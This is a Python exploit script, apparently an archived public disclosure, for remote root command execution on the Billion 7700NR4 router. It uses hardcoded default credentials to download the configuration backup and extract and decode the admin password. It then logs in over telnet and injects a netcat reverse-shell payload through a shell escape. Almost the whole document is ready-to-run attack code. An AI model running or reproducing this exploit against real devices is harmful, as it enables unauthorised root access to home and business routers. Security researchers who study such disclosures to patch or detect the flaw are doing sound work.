69 lines
No EOL
2.5 KiB
Python
Executable file
69 lines
No EOL
2.5 KiB
Python
Executable file
# Title : Billion Router 7700NR4 Remote Root Command Execution
|
|
# Date : 06/10/2016
|
|
# Author : R-73eN
|
|
# Tested on: Billion Router 7700NR4
|
|
# Vendor : http://www.billion.com/
|
|
# Vulnerability Description:
|
|
# This router is a widely used here in Albania. It is given by a telecom provider to the home and bussiness users.
|
|
# The problem is that this router has hardcoded credentials which "can not be changed" by a normal user. Using these
|
|
# credentials we don't have to much access but the lack of authentication security we can download the backup and get the admin password.
|
|
# Using that password we can login to telnet server and use a shell escape to get a reverse root connection.
|
|
# You must change host with the target and reverse_ip with your attacking ip.
|
|
# Fix:
|
|
# The only fix is hacking your router with this exploit, changing the credentials and disabling all the other services using iptables.
|
|
#
|
|
|
|
import requests
|
|
import base64
|
|
import socket
|
|
import time
|
|
|
|
host = ""
|
|
def_user = "user"
|
|
def_pass = "user"
|
|
reverse_ip = ""
|
|
#Banner
|
|
banner = ""
|
|
banner +=" ___ __ ____ _ _ \n"
|
|
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
|
|
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
|
|
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
|
|
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
|
|
print banner
|
|
|
|
|
|
# limited shell escape
|
|
evil = 'ping ;rm /tmp/backpipe;cd tmp;echo "mknod backpipe p && nc ' + reverse_ip + ' 1337 0<backpipe | /bin/sh 1>backpipe &" > /tmp/rev.sh;chmod +x rev.sh;sh /tmp/rev.sh &'
|
|
|
|
def execute_payload(password):
|
|
print "[+] Please run nc -lvp 1337 and then press any key [+]"
|
|
raw_input()
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
s.connect((host,23))
|
|
s.recv(1024)
|
|
s.send("admin\r")
|
|
a= s.recv(1024)
|
|
time.sleep(1)
|
|
s.send(password +"\r")
|
|
time.sleep(1)
|
|
s.recv(1024)
|
|
s.send(evil + "\r")
|
|
time.sleep(1)
|
|
print "[+] If everything worked you should get a reverse shell [+]"
|
|
print "[+] Warning pressing any key will close the SHELL [+]"
|
|
raw_input()
|
|
|
|
|
|
|
|
|
|
r = requests.get("http://" + host + "/backupsettings.conf" , auth=(def_user,def_pass))
|
|
if(r.status_code == 200):
|
|
print "[+] Seems the exploit worked [+]"
|
|
print "[+] Dumping data . . . [+]"
|
|
temp = r.text
|
|
admin_pass = temp.split("<AdminPassword>")[1].split("</AdminPassword>")[0]
|
|
# print "[+] Admin password : " + str(base64.b64decode(admin_pass)) + " [+]"
|
|
execute_payload(str(base64.b64decode(admin_pass)))
|
|
else:
|
|
print "[-] Exploit Failed [-]"
|
|
print "\n[+] https://www.infogen.al/ [+]\n\n" |